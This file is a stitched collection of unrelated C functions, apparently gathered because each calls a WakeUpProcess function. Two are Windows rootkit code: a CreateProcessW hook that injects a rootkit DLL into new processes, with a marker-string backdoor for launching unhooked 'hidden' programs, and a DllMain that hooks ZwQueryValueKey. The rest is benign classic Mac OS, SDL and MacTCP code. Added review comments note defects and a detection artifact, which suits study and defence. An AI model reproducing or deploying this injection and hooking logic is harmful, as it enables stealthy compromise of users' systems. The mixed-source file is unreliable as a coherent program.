// Backdoor : if application name or command line contains RTK_FILE_CHAR
// the created process is *not* hooked.
// Useful to launch hidden process from windows gui/cmd.exe that performs
// a search before delegating the creation of the process to CreateProcess
// To launch a non hijacked process using cmd, do the following :
// run: cmd.exe
// type: cmd.exe _nti (where _nti is RTK_FILE_CHAR )
// then run your hidden program from the non hijacked shell
//
// Hook replacement for kernel32!CreateProcessW. It resolves the real
// CreateProcessW lazily through fGetProcAddress, creates the child
// SUSPENDED, then either injects kNTIDllPath into it (InjectDll) or, when
// the ANSI copy of the application name or command line contains
// RTK_FILE_CHAR, skips injection and calls WakeUpProcess() on the new PID.
// Returns the real CreateProcessW's result, or 0 when CreateProcessW could
// not be resolved from kernel32.dll.
//
// NOTE(review): defects visible in this block —
//  * the caller's dwCreationFlags is discarded and replaced by
//    CREATE_SUSPENDED, so every flag the caller asked for is lost
//    (dwCreationFlags | CREATE_SUSPENDED would preserve them);
//  * both handles returned to the caller in lpProcessInformation are
//    closed before returning, so a caller that waits on hProcess or closes
//    the handles itself operates on already-closed handles;
//  * whether the suspended primary thread is ever resumed on the inject
//    path depends on InjectDll(), which is not visible here — confirm;
//  * the marker test runs on 255-byte ANSI truncations of the wide
//    strings, so a marker past the 255th character is not seen;
//  * msg[] is zeroed but never used.
// Detection note: the RTK_FILE_CHAR marker in a process command line is an
// observable artifact of this bypass.
BOOL WINAPI MyCreateProcessW(LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation)
{
    int bResult, bInject=1;
    char msg[1024], cmdline[256], appname[256];

    OutputString("[i] CreateProcessW()\n");

    // do not rely on info given by HijackApi() since we may have hijacked at GetProcAddress() level
    if(!fCreateProcessW) {
        fCreateProcessW = (FARPROC) fGetProcAddress(GetModuleHandle("kernel32.dll"),"CreateProcessW");
        if(!fCreateProcessW) return 0;
    }

    my_memset(msg, 0, 1024);
    my_memset(cmdline, 0, 256);
    my_memset(appname, 0, 256);

    //Convert strings from unicode : at most 255 bytes each. The buffers were
    // zeroed above, so a NULL source or a failed conversion leaves an empty
    // string and the strstr() tests below simply find nothing.
    WideCharToMultiByte(CP_ACP, 0,(const unsigned short *)lpApplicationName, -1, appname, 255,NULL, NULL);
    WideCharToMultiByte(CP_ACP, 0,(const unsigned short *)lpCommandLine, -1, cmdline, 255,NULL, NULL);

    OutputString("\n[!!] Hooked CreateProcessW : %s - %s, injecting rootkit (%s)...\n", (char*)appname, (char*)cmdline, (char*)kNTIDllPath);

    // Create the child suspended so the DLL can be injected before its first
    // instruction runs. NOTE(review): the caller's dwCreationFlags is dropped here.
    bResult = (int) fCreateProcessW((const unsigned short *)lpApplicationName, (unsigned short *)lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, CREATE_SUSPENDED /*dwCreationFlags*/, lpEnvironment, (const unsigned short *)lpCurrentDirectory, (struct _STARTUPINFOW *)lpStartupInfo, lpProcessInformation);

    // inject the created process if its name & command line doesn't contain RTK_FILE_CHAR
    if(bResult) {
        if(lpCommandLine) {
            if(strstr((char*)cmdline,(char*)RTK_FILE_CHAR)){
                OutputString("\n[i] CreateProcessW: Giving true sight to process '%s'...\n", (char*)appname);
                // Marker found: leave the child un-hooked. WakeUpProcess() here is
                // this project's own helper taking a PID, not the Mac OS API.
                WakeUpProcess(lpProcessInformation->dwProcessId);
                bInject = 0;
            }
        }
        if(lpApplicationName) {
            if(strstr((char*)appname,(char*)RTK_FILE_CHAR)) {
                OutputString("\n[i] CreateProcessW: Giving true sight to process '%s'...\n", (char*)appname);
                // Same bypass keyed on the application name; when both strings
                // carry the marker WakeUpProcess() is called twice for one PID.
                WakeUpProcess(lpProcessInformation->dwProcessId);
                bInject = 0;
            }
        }
        if(bInject)
            InjectDll(lpProcessInformation->hProcess, (char*)kNTIDllPath);
        // NOTE(review): these are the handles the caller receives in
        // lpProcessInformation (see header comment).
        CloseHandle(lpProcessInformation->hProcess);
        CloseHandle(lpProcessInformation->hThread);
    }
    return bResult;
}
/*
 * Replace the text of the static-text control `id` and make the change
 * visible right away.
 *
 * id:   control identifier understood by GetControl()
 * text: NUL-terminated string to display (must not be NULL; strlen() is
 *       applied to it unconditionally)
 *
 * After DrawOneControl(), the current process is woken so the event loop
 * repaints without waiting for the next event (the original author marked
 * this wake-up as a hack).
 */
void SetStaticText(int id, const char *text)
{
    ControlRef control = GetControl(id);
    size_t textLen = strlen(text);
    ProcessSerialNumber self = { 0, kCurrentProcess };

    SetControlData(control, kControlNoPart, kControlStaticTextTextTag, textLen, text);
    DrawOneControl(control);

    /* Nudge the event loop so the redraw shows up immediately. */
    WakeUpProcess(&self);
}
/*
 * Time Manager stub that wraps SDL's alarm callback.
 *
 * Wakes the process recorded in the extended task record, runs
 * SDL_alarm_callback() with the current interval, and re-arms the timer with
 * the (resolution-rounded) interval the callback returns. A return of 0
 * stops the timer: SDL_alarm_interval is cleared and PrimeTime() is not
 * called again.
 *
 * tmTaskPtr is really an ExtendedTimerPtr (tmTask is its first member);
 * the re-arm uses the global gExtendedTimerRec, not tmTaskPtr.
 */
pascal void TimerCallbackProc(TMTaskPtr tmTaskPtr)
{
    ExtendedTimerPtr task = (ExtendedTimerPtr) tmTaskPtr;
    Uint32 next;

    WakeUpProcess(&task->taskPSN);

    next = SDL_alarm_callback(SDL_alarm_interval);
    if (!next) {
        /* Callback asked to stop: leave the timer unarmed. */
        SDL_alarm_interval = 0;
        return;
    }

    SDL_alarm_interval = ROUND_RESOLUTION(next);
    PrimeTime((QElemPtr)&gExtendedTimerRec.tmTask, SDL_alarm_interval);
}
// Queue a stream for polling in the event loop. // May be called in interrupt. void StreamWait(Stream *stream) { if (stream->qType) { // already in the queue return; } // add the stream to the queue stream->qType = true; Enqueue((QElemPtr)stream, &readyStreams); // trigger our event loop to take control if (hasPSN) { WakeUpProcess(&psn); } }
/*
 * DLL entry point.
 *
 * On DLL_PROCESS_ATTACH it installs a hook on ntdll!ZwQueryValueKey via
 * HookApi(), routing calls to MyZwQueryValueKey and saving the original in
 * fZwQueryValueKey, reports the outcome with OutputDebugString(), and then
 * calls WakeUpProcess(0) (a project helper, not the Mac OS API). Every other
 * attach/detach reason is a no-op. Always returns TRUE, even when the hook
 * fails, so the DLL is never unloaded for a failed hook.
 *
 * NOTE(review): the hook address is cast to DWORD, which only round-trips a
 * pointer in a 32-bit process — presumably 32-bit-only code. What
 * MyZwQueryValueKey filters is not visible here.
 */
BOOL WINAPI DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    const char *status;

    if (ul_reason_for_call != DLL_PROCESS_ATTACH)
        return TRUE;

    status = HookApi("ntdll.dll", "ZwQueryValueKey",
                     (DWORD)&MyZwQueryValueKey, &fZwQueryValueKey)
                 ? "ZwQueryValueKey hook: OK.\n"
                 : "ZwQueryValueKey hook: FAILED.\n";
    OutputDebugString(status);

    WakeUpProcess(0);
    return TRUE;
}
/*
 * MacTCP asynchronous notification routine (ASR).
 *
 * Every parameter is ignored; the routine's only job is to wake our process
 * (psn, a file-level global) so the main loop runs and services the stream.
 * It is kept to that single call presumably because MacTCP invokes ASRs at
 * interrupt time — confirm against the caller's constraints.
 */
static pascal void mactcp_asr(StreamPtr str, unsigned short event, Ptr cookie,
                              unsigned short termin_reason, struct ICMPReport *icmp)
{
    (void)str;
    (void)event;
    (void)cookie;
    (void)termin_reason;
    (void)icmp;

    WakeUpProcess(&psn);
}